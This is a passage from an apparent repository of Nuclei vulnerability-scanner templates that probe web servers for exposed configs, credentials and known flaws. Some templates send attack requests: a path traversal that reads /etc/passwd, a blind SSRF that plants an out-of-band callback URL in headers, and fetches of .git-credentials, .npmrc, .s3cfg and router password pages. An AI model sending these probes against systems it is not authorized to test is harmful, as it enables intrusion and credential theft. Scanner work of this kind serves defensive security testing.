├── .github ├── funding.yml └── workflows │ └── syntax-checking.yml ├── SECURITY.md ├── x-hacker.yaml ├── missing-csp.yaml ├── display-via-header.yaml ├── php-ini.yaml ├── tor-socks-proxy.yaml ├── fps-config.yaml ├── pi-hole-detect.yaml ├── htpasswd-detection.yaml ├── php-fpm-status.yaml ├── .yamllint ├── npmrc.yaml ├── zeroshell-kerbynet-lfd.yaml ├── kong-detect.yaml ├── tox-ini.yaml ├── terraform-detect.yaml ├── elasticsearch-cluster-health.yaml ├── redis-conf.yaml ├── header-blind-ssrf.yaml ├── google-floc-disabled.yaml ├── vernemq-status.yaml ├── circleci-ssh-config.yaml ├── detect-rsyncd.yaml ├── git-credentials.yaml ├── goliath-detect.yaml ├── lucee-detect.yaml ├── php-user-ini.yaml ├── circleci-config.yaml ├── ws-config.yaml ├── django-debug.yaml ├── magento-config.yaml ├── nginx-vhost-traffic-status.yaml ├── rails-secret-token.yaml ├── mrtg-detect.yaml ├── detect-drone.yaml ├── comtrend-ct5367-remote-root.yaml ├── redmine-cli-detect.yaml ├── s3cfg.yaml ├── dbeaver-data-sources.yaml ├── dockercfg.yaml ├── homeworks-illumination-web-keypad.yaml ├── ssh-known-hosts.yaml ├── eyelock-nano-lfd.yaml ├── pagespeed-global-admin.yaml ├── salesforce-login.yaml ├── swagger-xss.yaml ├── ventrilo-config.yaml ├── CVE-2018-3167.yaml ├── ssh-authorized-keys.yaml ├── circarlife-default-login.yaml ├── ganglia-xml-grid-monitor.yaml ├── CVE-2019-0230.yaml ├── pmb-directory-traversal.yaml ├── tectuus-scada-monitor.yaml ├── esmtprc.yaml ├── lutron-iot-default-login.yaml ├── ftpconfig.yaml ├── sftp-config.yaml ├── CVE-2021-33904.yaml ├── CVE-2018-2894.yaml ├── gmail-api-client-secrets.yaml ├── selea-ip-camera.yaml ├── CVE-2014-2323.yaml ├── pyramid-debug-toolbar.yaml ├── redmine-db-config.yaml ├── CVE-2017-16806.yaml ├── avtech-dvr-exposure.yaml ├── jetty-information-disclosure.yaml ├── zwave2mqtt-health-check.yaml ├── CVE-2018-11784.yaml ├── CVE-2021-26475.yaml ├── config-file.yaml ├── django-secret.key.yaml ├── php-timeclock-xss.yaml ├── robomongo.yaml ├── CVE-2018-16670.yaml ├── CVE-2009-0545.yaml ├── CVE-2018-12634.yaml ├── CVE-2021-31581.yaml ├── dbeaver-credentials.yaml ├── remote-sync.yaml ├── CVE-2018-16668.yaml ├── CVE-2020-22840.yaml ├── CVE-2020-29164.yaml ├── chamilo-lms-xss.yaml ├── laravel-telescope.yaml ├── openstack-user-secrets.yaml ├── cacti-detect.yaml ├── node-nunjucks-ssti.yaml ├── CVE-2020-24949.yaml ├── huawei-dg8045-auth-bypass.yaml ├── upnp-device.yaml ├── vscode-sftp.yaml ├── detect-tracer-sc-web.yaml ├── CVE-2018-16671.yaml ├── CVE-2020-23517.yaml ├── firebase-config.yaml ├── sftp-deployment-config.yaml ├── CVE-2020-25540.yaml ├── CVE-2021-24286.yaml ├── couchbase-buckets-rest-api.yaml ├── detect-dns-over-https.yaml ├── putty-user-keyfile.yaml ├── CVE-2021-28937.yaml ├── CVE-2021-29622.yaml ├── prtg-detect.yaml ├── production-logs.yaml ├── solar-log-500.yaml ├── CVE-2021-3374.yaml ├── detect-workerman-websocket-server.yaml ├── CVE-2009-4223.yaml ├── jetbrains-webservers-xml.yaml ├── landfill-remote-monitoring-control.yaml ├── CVE-2019-15859.yaml ├── CVE-2021-32820.yaml ├── CVE-2007-0885.yaml ├── spidercontrol-scada-server-info.yaml ├── monitorix-exposure.yaml ├── old-copyright.yaml ├── yii-debugger.yaml ├── blind-xxe.yaml ├── viewlinc-crlf-injection.yaml ├── CVE-2016-0957.yaml ├── apache-filename-brute-force.yaml ├── git-mailmap.yaml ├── CVE-2021-31800.yaml ├── header-command-injection.yaml ├── CVE-2020-19625.yaml ├── db-schema.yaml ├── CVE-2021-31537.yaml ├── CVE-2014-2321.yaml ├── darkstat-detect.yaml ├── netgear-router-disclosure.yaml ├── CVE-2020-13379.yaml ├── CVE-2021-27132.yaml ├── CVE-2021-31250.yaml ├── development-logs.yaml ├── sony-bravia-disclosure.yaml ├── beward-ipcamera-disclosure.yaml ├── CVE-2015-6477.yaml ├── CVE-2021-3377.yaml ├── netrc.yaml ├── CVE-2021-31249.yaml ├── public-documents.yaml ├── CVE-2020-9402.yaml ├── routes-ini.yaml ├── LICENSE ├── squid-analysis-report-generator.yaml ├── CVE-2018-1000600.yaml ├── rpcbind-portmapper.yaml ├── CVE-2021-24291.yaml ├── CVE-2021-33221.yaml ├── server-private-keys.yaml ├── xmlrpc-pingback-ssrf.yaml ├── ssrf-by-proxy.yaml ├── fuzz-oauth.yaml ├── application-ini.yaml ├── CVE-2017-15715.yaml ├── keys-js.yaml ├── auth-js.yaml ├── header-blind-sql-injection.yaml ├── config-js.yaml ├── CVE-2013-4786.yaml ├── oauth-state-bypass.yaml ├── kubernetes-api-exposure.yaml ├── dom-xss.yaml ├── http2-request-smuggling.yaml ├── CVE-2020-36112.yaml ├── container-escape-detection.yaml ├── .gitignore ├── websocket-upgrade-oob.yaml ├── tls-pqc-downgrade-attack.yaml ├── ssti-polyglot-multi-engine-oob.yaml ├── CVE-2017-17562.yaml ├── websocket-relay-oob.yaml ├── php-config-backup-exposure.yaml ├── jwt-algorithm-confusion.yaml ├── websocket-auth-bypass-oob.yaml ├── sensitive-config-exposure.yaml ├── websocket-origin-bypass-oob.yaml ├── graphql-depth-bomb.yaml ├── websocket-auth-bypass-real.yaml ├── websocket-subscription-oob.yaml ├── http3-protocol-downgrade-attack.yaml ├── graphql-subscription-oob.yaml └── http3-quic-smuggling.yaml /.github/funding.yml: -------------------------------------------------------------------------------- 1 | github: geeknik 2 | custom: https://buymeacoffee.com/geeknik 3 | -------------------------------------------------------------------------------- /SECURITY.md: -------------------------------------------------------------------------------- 1 | The purpose of this file is to silence the GitHub warning about missing security policy files. 2 | -------------------------------------------------------------------------------- /.github/workflows/syntax-checking.yml: -------------------------------------------------------------------------------- 1 | name: YAML Lint 2 | 3 | on: [push] 4 | 5 | jobs: 6 | lintAllTheThings: 7 | runs-on: ubuntu-latest 8 | steps: 9 | - uses: actions/checkout@v1 10 | - name: yaml-lint 11 | uses: ibiqlik/action-yamllint@v3 12 | -------------------------------------------------------------------------------- /x-hacker.yaml: -------------------------------------------------------------------------------- 1 | id: x-hacker 2 | 3 | info: 4 | name: Displays the X-Hacker server header if defined 5 | author: geeknik 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}" 12 | 13 | extractors: 14 | - type: regex 15 | part: header 16 | name: x-hacker 17 | regex: 18 | - '(?i)X-Hacker:.*' 19 | -------------------------------------------------------------------------------- /missing-csp.yaml: -------------------------------------------------------------------------------- 1 | id: missing-csp 2 | info: 3 | name: CSP Not Enforced 4 | author: geeknik 5 | severity: info 6 | description: Checks if there is a CSP header 7 | tags: misc 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | redirects: true 14 | matchers: 15 | - type: dsl 16 | dsl: 17 | - '!contains(tolower(all_headers), ''content-security-policy'')' 18 | -------------------------------------------------------------------------------- /display-via-header.yaml: -------------------------------------------------------------------------------- 1 | id: display-via-header 2 | 3 | info: 4 | name: Display Via Header 5 | author: geeknik 6 | reference: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Via 7 | severity: info 8 | tags: misc 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | redirects: true 16 | extractors: 17 | - type: regex 18 | part: header 19 | regex: 20 | - "Via:.*" 21 | -------------------------------------------------------------------------------- /php-ini.yaml: -------------------------------------------------------------------------------- 1 | id: php-ini 2 | 3 | info: 4 | name: php.ini 5 | author: geeknik 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/php.ini" 12 | 13 | matchers-condition: and 14 | matchers: 15 | - type: status 16 | status: 17 | - 200 18 | - type: word 19 | words: 20 | - "[PHP]" 21 | - "short_open_tag" 22 | - "safe_mode" 23 | - "expose_php" 24 | condition: and 25 | -------------------------------------------------------------------------------- /tor-socks-proxy.yaml: -------------------------------------------------------------------------------- 1 | id: tor-socks-proxy 2 | info: 3 | name: Detect tor SOCKS proxy 4 | author: geeknik 5 | severity: info 6 | 7 | requests: 8 | - method: GET 9 | path: 10 | - '{{BaseURL}}' 11 | 12 | matchers-condition: and 13 | matchers: 14 | - type: word 15 | words: 16 | - "This is a SOCKS Proxy" 17 | - "HTTPTunnelPort" 18 | - "SOCKSPort" 19 | condition: and 20 | - type: status 21 | status: 22 | - 501 23 | -------------------------------------------------------------------------------- /fps-config.yaml: -------------------------------------------------------------------------------- 1 | id: fps-config 2 | 3 | info: 4 | name: FrontPage Server Config Exposure 5 | author: nullenc0de 6 | severity: critical 7 | description: FrontPage Server Config Exposure 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/_vti_pvt/service.pwd" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | - type: word 20 | words: 21 | - "# -FrontPage-" 22 | part: body 23 | -------------------------------------------------------------------------------- /pi-hole-detect.yaml: -------------------------------------------------------------------------------- 1 | id: pi-hole-detect 2 | info: 3 | name: pi-hole detector 4 | author: geeknik 5 | severity: info 6 | 7 | requests: 8 | - method: GET 9 | path: 10 | - "{{BaseURL}}/admin/index.php" 11 | 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: word 18 | words: 19 | - "Pi-hole" 20 | - "Web Interface" 21 | - "FTL" 22 | part: body 23 | condition: and 24 | -------------------------------------------------------------------------------- /htpasswd-detection.yaml: -------------------------------------------------------------------------------- 1 | id: htpasswd 2 | 3 | info: 4 | name: Detect exposed .htpasswd files 5 | author: geeknik 6 | severity: info 7 | tags: config,exposure 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/.htpasswd" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - ":{SHA}" 19 | - ":$apr1$" 20 | - ":$2y$" 21 | condition: or 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /php-fpm-status.yaml: -------------------------------------------------------------------------------- 1 | id: php-fpm-status 2 | 3 | info: 4 | name: PHP-FPM Status 5 | author: geeknik 6 | severity: info 7 | tags: config 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/status?full" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'pool:' 19 | - 'process manager:' 20 | - 'start time:' 21 | - 'pid:' 22 | condition: and 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /.yamllint: -------------------------------------------------------------------------------- 1 | --- 2 | extends: default 3 | 4 | ignore: | 5 | .pre-commit-config.yml 6 | .github/ 7 | .git/ 8 | *.yml 9 | 10 | rules: 11 | document-start: disable 12 | comments-indentation: disable 13 | line-length: disable 14 | new-lines: disable 15 | new-line-at-end-of-file: disable 16 | truthy: disable 17 | comments: 18 | require-starting-space: true 19 | ignore-shebangs: true 20 | min-spaces-from-content: 1 21 | empty-lines: 22 | max: 5 23 | braces: 24 | forbid: true 25 | brackets: 26 | forbid: true 27 | -------------------------------------------------------------------------------- /npmrc.yaml: -------------------------------------------------------------------------------- 1 | id: npmrc 2 | 3 | info: 4 | name: Detect .npmrc 5 | author: geeknik 6 | description: npm registry authentication data 7 | severity: high 8 | tags: npm,auth 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/.npmrc" 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | part: header 18 | words: 19 | - "text/plain" 20 | - type: word 21 | words: 22 | - "_auth=" 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /zeroshell-kerbynet-lfd.yaml: -------------------------------------------------------------------------------- 1 | id: zeroshell-kerbynet-lfd 2 | 3 | info: 4 | name: ZeroShell 'cgi-bin/kerbynet' - Local File Disclosure 5 | author: geeknik 6 | reference: https://www.exploit-db.com/exploits/28558 7 | severity: high 8 | tags: zeroshell,kerbynet,lfd 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../etc/passwd" 14 | 15 | matchers: 16 | - type: regex 17 | part: body 18 | regex: 19 | - "root:[x*]:0:0:" 20 | -------------------------------------------------------------------------------- /kong-detect.yaml: -------------------------------------------------------------------------------- 1 | id: kong-detect 2 | info: 3 | name: Detect Kong 4 | author: geeknik 5 | description: The Cloud-Native API Gateway - https://github.com/Kong/kong 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}" 12 | 13 | matchers-condition: and 14 | matchers: 15 | 16 | - type: regex 17 | part: header 18 | regex: 19 | - "[Ss]erver: [Kk]ong+" 20 | 21 | extractors: 22 | - type: kval 23 | part: header 24 | kval: 25 | - server 26 | -------------------------------------------------------------------------------- /tox-ini.yaml: -------------------------------------------------------------------------------- 1 | id: tox-ini 2 | 3 | info: 4 | name: Detect tox.ini 5 | author: geeknik 6 | reference: https://tox.readthedocs.io/en/latest/config.html 7 | severity: high 8 | tags: tox,config,aws,auth 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/tox.ini" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "AWS_ACCESS_KEY_ID" 20 | - "AWS_SECRET_ACCESS_KEY" 21 | condition: and 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /terraform-detect.yaml: -------------------------------------------------------------------------------- 1 | id: terraform-detect 2 | info: 3 | name: Detect Terraform Provider 4 | author: geeknik 5 | description: Write Infrastructure as Code - https://www.terraform.io/ 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/provider.tf" 12 | 13 | matchers-condition: and 14 | matchers: 15 | - type: word 16 | part: body 17 | words: 18 | - access_key 19 | - terraform 20 | condition: and 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /elasticsearch-cluster-health.yaml: -------------------------------------------------------------------------------- 1 | id: elasticsearch-cluster-health 2 | 3 | info: 4 | name: ElasticSearch Cluster Health 5 | author: geeknik 6 | severity: low 7 | tags: elasticsearch 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/_cluster/health?pretty" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | - type: word 20 | words: 21 | - '"cluster_name" :' 22 | - '"status" :' 23 | - '"timed_out" :' 24 | condition: and 25 | -------------------------------------------------------------------------------- /redis-conf.yaml: -------------------------------------------------------------------------------- 1 | id: redis-conf 2 | 3 | info: 4 | name: Redis Configuration File 5 | author: geeknik 6 | description: 7 | severity: high 8 | tags: redis,config 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/redis.conf" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "Redis configuration file example" 20 | - "INCLUDES" 21 | - "MODULES" 22 | - "NETWORK" 23 | condition: and 24 | - type: status 25 | status: 26 | - 200 27 | -------------------------------------------------------------------------------- /header-blind-ssrf.yaml: -------------------------------------------------------------------------------- 1 | id: header-blind-ssrf 2 | 3 | info: 4 | name: Header Blind SSRF 5 | author: geeknik 6 | severity: high 7 | description: Checks for Blind SSR via popular browser headers. 8 | 9 | requests: 10 | - payloads: 11 | header: helpers/payloads/request-headers.txt 12 | 13 | raw: 14 | - | 15 | GET /?§header§ HTTP/1.1 16 | Host: {{Hostname}} 17 | §header§: {{interactsh-url}} 18 | Connection: close 19 | 20 | matchers: 21 | - type: word 22 | part: interactsh_protocol 23 | words: 24 | - "http" 25 | -------------------------------------------------------------------------------- /google-floc-disabled.yaml: -------------------------------------------------------------------------------- 1 | id: google-floc-disabled 2 | 3 | info: 4 | name: Google FLoC Disabled 5 | author: geeknik 6 | description: The detected website has decided to explicity exclude itself from Google FLoC tracking. 7 | reference: https://www.bleepingcomputer.com/news/security/github-disables-google-floc-user-tracking-on-its-website/ 8 | severity: info 9 | tags: google,floc 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | part: header 19 | words: 20 | - "interest-cohort=()" 21 | -------------------------------------------------------------------------------- /vernemq-status.yaml: -------------------------------------------------------------------------------- 1 | id: vernemq-status 2 | 3 | info: 4 | name: VerneMQ Status Check 5 | reference: 6 | - https://github.com/vernemq/vernemq 7 | author: geeknik 8 | severity: info 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/status" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | - type: word 21 | words: 22 | - "VerneMQ Status" 23 | - "Issues" 24 | - "Cluster Overview" 25 | - "Node Status" 26 | condition: and 27 | -------------------------------------------------------------------------------- /circleci-ssh-config.yaml: -------------------------------------------------------------------------------- 1 | id: circleci-ssh-config 2 | 3 | info: 4 | name: circleci ssh-config exposure 5 | author: geeknik 6 | severity: low 7 | tags: config,exposure 8 | 9 | requests: 10 | - method: GET 11 | redirects: true 12 | max-redirects: 3 13 | path: 14 | - "{{BaseURL}}/.circleci/ssh-config" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "Host" 21 | - "HostName" 22 | - "IdentityFile" 23 | condition: and 24 | 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /detect-rsyncd.yaml: -------------------------------------------------------------------------------- 1 | id: detect-rsyncd 2 | 3 | info: 4 | name: Detect rsyncd 5 | reference: https://linux.die.net/man/1/rsync 6 | author: geeknik 7 | severity: info 8 | tags: network,rsyncd 9 | 10 | network: 11 | - inputs: 12 | - data: "?\r\n" 13 | 14 | host: 15 | - "{{Hostname}}" 16 | - "{{Hostname}}:873" 17 | 18 | matchers: 19 | - type: word 20 | words: 21 | - "RSYNCD: " 22 | - "ERROR: protocol startup error" 23 | condition: and 24 | extractors: 25 | - type: regex 26 | regex: 27 | - 'RSYNCD: \d\d.\d' 28 | -------------------------------------------------------------------------------- /git-credentials.yaml: -------------------------------------------------------------------------------- 1 | id: git-credentials 2 | 3 | info: 4 | name: Github Authentication Dotfile 5 | author: geeknik 6 | severity: high 7 | tags: github,auth 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/.git-credentials" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | part: header 18 | words: 19 | - "text/plain" 20 | - type: word 21 | words: 22 | - "https://" 23 | - "@github.com" 24 | condition: and 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /goliath-detect.yaml: -------------------------------------------------------------------------------- 1 | id: goliath-detect 2 | 3 | info: 4 | name: Detect Goliath 5 | author: geeknik 6 | description: Goliath is a non-blocking Ruby web server framework -- https://github.com/postrank-labs/goliath 7 | severity: info 8 | tags: goliath 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers-condition: and 16 | matchers: 17 | 18 | - type: regex 19 | part: header 20 | regex: 21 | - Goliath+ 22 | 23 | extractors: 24 | - type: kval 25 | part: header 26 | kval: 27 | - Server 28 | -------------------------------------------------------------------------------- /lucee-detect.yaml: -------------------------------------------------------------------------------- 1 | id: lucee-detect 2 | info: 3 | name: Detect Lucee 4 | author: geeknik 5 | description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development -- https://github.com/lucee/Lucee/ 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}" 12 | 13 | matchers: 14 | 15 | - type: regex 16 | part: header 17 | regex: 18 | - "(?i)X-Lucee-Version" 19 | - "(?i)X-CB-Server: LUCEE" 20 | - "(?i)X-IDG-Appserver: Lucee" 21 | condition: or 22 | -------------------------------------------------------------------------------- /php-user-ini.yaml: -------------------------------------------------------------------------------- 1 | id: php-user-ini 2 | 3 | info: 4 | name: PHP .user.ini Disclosure 5 | author: geeknik 6 | reference: https://www.php.net/manual/en/configuration.file.per-user.php 7 | severity: low 8 | tags: php 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/.user.ini" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | - type: word 21 | words: 22 | - "text/plain" 23 | part: header 24 | 25 | - type: dsl 26 | dsl: 27 | - "len(body) > 50" 28 | -------------------------------------------------------------------------------- /circleci-config.yaml: -------------------------------------------------------------------------------- 1 | id: circleci-config 2 | 3 | info: 4 | name: circleci config.yml exposure 5 | author: geeknik 6 | severity: low 7 | reference: https://circleci.com/docs/2.0/sample-config/ 8 | tags: config,exposure 9 | 10 | requests: 11 | - method: GET 12 | redirects: true 13 | max-redirects: 3 14 | path: 15 | - "{{BaseURL}}/.circleci/config.yml" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: dsl 20 | dsl: 21 | - 'regex("^version: ", body) && contains(body, "jobs:")' 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /ws-config.yaml: -------------------------------------------------------------------------------- 1 | id: ws-config 2 | 3 | info: 4 | name: Websheets Config 5 | author: geeknik 6 | reference: https://github.com/daveagp/websheets 7 | severity: high 8 | tags: websheets,auth 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/ws-config.json" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | part: header 19 | words: 20 | - "application/json" 21 | - type: word 22 | words: 23 | - "db-user" 24 | - "db-password" 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /django-debug.yaml: -------------------------------------------------------------------------------- 1 | id: django-debug 2 | 3 | info: 4 | name: Django Debug Exposure 5 | author: geeknik 6 | reference: https://twitter.com/Alra3ees/status/1397660633928286208 7 | severity: high 8 | tags: django 9 | 10 | requests: 11 | - method: POST 12 | path: 13 | - "{{BaseURL}}/admin/login/?next=/admin/" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 500 20 | - type: word 21 | part: body 22 | words: 23 | - "DB_HOST" 24 | - "DB_NAME" 25 | - "DJANGO" 26 | condition: and 27 | -------------------------------------------------------------------------------- /magento-config.yaml: -------------------------------------------------------------------------------- 1 | id: magento-config 2 | info: 3 | name: Magento Config Disclosure 4 | author: geeknik 5 | severity: medium 6 | tags: config,exposure 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/app/etc/local.xml" 12 | - "{{BaseURL}}/store/app/etc/local.xml" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | 20 | - type: word 21 | words: 22 | - "text/xml" 23 | part: header 24 | 25 | - type: word 26 | words: 27 | - "Magento" 28 | part: body -------------------------------------------------------------------------------- /nginx-vhost-traffic-status.yaml: -------------------------------------------------------------------------------- 1 | id: nginx-vhost-traffic-status 2 | 3 | info: 4 | name: Nginx Vhost Traffic Status 5 | author: geeknik 6 | reference: https://github.com/vozlt/nginx-module-vts 7 | severity: low 8 | tags: status,nginx,misconfig 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/status" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "Nginx Vhost Traffic Status" 20 | - "Host" 21 | - "Zone" 22 | condition: and 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /rails-secret-token.yaml: -------------------------------------------------------------------------------- 1 | id: rails-secret-token 2 | 3 | info: 4 | name: Rails Secret Token 5 | author: geeknik 6 | severity: high 7 | tags: config,auth,api 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/config/initializers/secret_token.rb" 13 | - "{{BaseURL}}/config/secrets.yml" 14 | - "{{BaseURL}}/.secrets" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "secret_key_base =" 21 | - "config.secret_token =" 22 | condition: or 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /mrtg-detect.yaml: -------------------------------------------------------------------------------- 1 | id: mrtg-detect 2 | info: 3 | name: Detect MRTG 4 | author: geeknik 5 | description: The Multi Router Traffic Grapher -- https://oss.oetiker.ch/mrtg/ 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}" 12 | - "{{BaseURL}}/mrtg/" 13 | - "{{BaseURL}}/MRTG/" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | - type: word 21 | part: body 22 | words: 23 | - "MRTG Index Page" 24 | - "Multi Router Traffic Grapher" 25 | condition: and 26 | -------------------------------------------------------------------------------- /detect-drone.yaml: -------------------------------------------------------------------------------- 1 | id: detect-drone-config 2 | 3 | info: 4 | name: Detect Drone Configuration 5 | author: geeknik 6 | description: Drone is a Container-Native, Continuous Delivery Platform -- https://github.com/drone/drone 7 | severity: high 8 | tags: config,exposure,drone 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/.drone.yml" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "kind:" 20 | - "name:" 21 | - "steps:" 22 | condition: and 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /comtrend-ct5367-remote-root.yaml: -------------------------------------------------------------------------------- 1 | id: comtrend-ct5367-remote-root 2 | 3 | info: 4 | name: COMTREND ADSL Router BTC(VivaCom) CT-5367 C01_R12 Remote Root 5 | author: geeknik 6 | reference: https://www.exploit-db.com/exploits/16275 7 | severity: high 8 | tags: comtrend,router,vivacom,iot,disclosure 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/password.cgi" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | - type: regex 21 | regex: 22 | - "pwdAdmin" 23 | - "pwdSupport" 24 | - "pwdUser" 25 | -------------------------------------------------------------------------------- /redmine-cli-detect.yaml: -------------------------------------------------------------------------------- 1 | id: redmine-cli-detect 2 | info: 3 | name: Detect Redmine CLI Configuration File 4 | author: geeknik 5 | description: A small command-line utility to interact with Redmine - https://pypi.org/project/Redmine-CLI/ 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/.redmine-cli" 12 | 13 | matchers-condition: and 14 | matchers: 15 | - type: word 16 | part: body 17 | words: 18 | - default 19 | - my_id 20 | - root_url 21 | condition: and 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /s3cfg.yaml: -------------------------------------------------------------------------------- 1 | id: s3cfg 2 | 3 | info: 4 | name: Detect .s3cfg 5 | author: geeknik 6 | description: Amazon S3 Authentication 7 | severity: high 8 | tags: amazon,s3,auth 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/.s3cfg" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | part: header 19 | words: 20 | - "text/plain" 21 | - type: word 22 | words: 23 | - "access_key" 24 | - "bucket_location" 25 | - "secret_key" 26 | condition: and 27 | - type: status 28 | status: 29 | - 200 30 | -------------------------------------------------------------------------------- /dbeaver-data-sources.yaml: -------------------------------------------------------------------------------- 1 | id: dbeaver-data-sources 2 | 3 | info: 4 | name: DBeaver Data Sources 5 | author: geeknik 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/.dbeaver/data-sources.json" 12 | 13 | matchers-condition: and 14 | matchers: 15 | - type: status 16 | status: 17 | - 200 18 | - type: word 19 | words: 20 | - "application/json" 21 | part: header 22 | - type: word 23 | words: 24 | - '"connection-types": {' 25 | - '"connections": {' 26 | - '"folders": {' 27 | condition: and 28 | -------------------------------------------------------------------------------- /dockercfg.yaml: -------------------------------------------------------------------------------- 1 | id: dockercfg 2 | 3 | info: 4 | name: Detect .dockercfg 5 | author: geeknik 6 | description: Docker registry authentication data 7 | severity: high 8 | tags: docker,auth 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/.dockercfg" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | part: header 19 | words: 20 | - "text/plain" 21 | - type: word 22 | words: 23 | - "https" 24 | - "email" 25 | - "auth" 26 | condition: and 27 | - type: status 28 | status: 29 | - 200 30 | -------------------------------------------------------------------------------- /homeworks-illumination-web-keypad.yaml: -------------------------------------------------------------------------------- 1 | id: homeworks-illumination-web-keypad 2 | 3 | info: 4 | name: Web Keypad for Lutron HomeWorks Illumination 5 | reference: https://www.lutron.com 6 | author: geeknik 7 | severity: high 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "HomeWorks Illumination Web Keypad" 19 | - "lutron.js" 20 | - "Lutron HomeWorks" 21 | - "Lutron Electronics, Inc." 22 | condition: and 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /ssh-known-hosts.yaml: -------------------------------------------------------------------------------- 1 | id: ssh-known-hosts 2 | 3 | info: 4 | name: SSH Known Hosts 5 | author: geeknik 6 | reference: https://datacadamia.com/ssh/known_hosts 7 | severity: low 8 | tags: config,exposure,ssh 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - 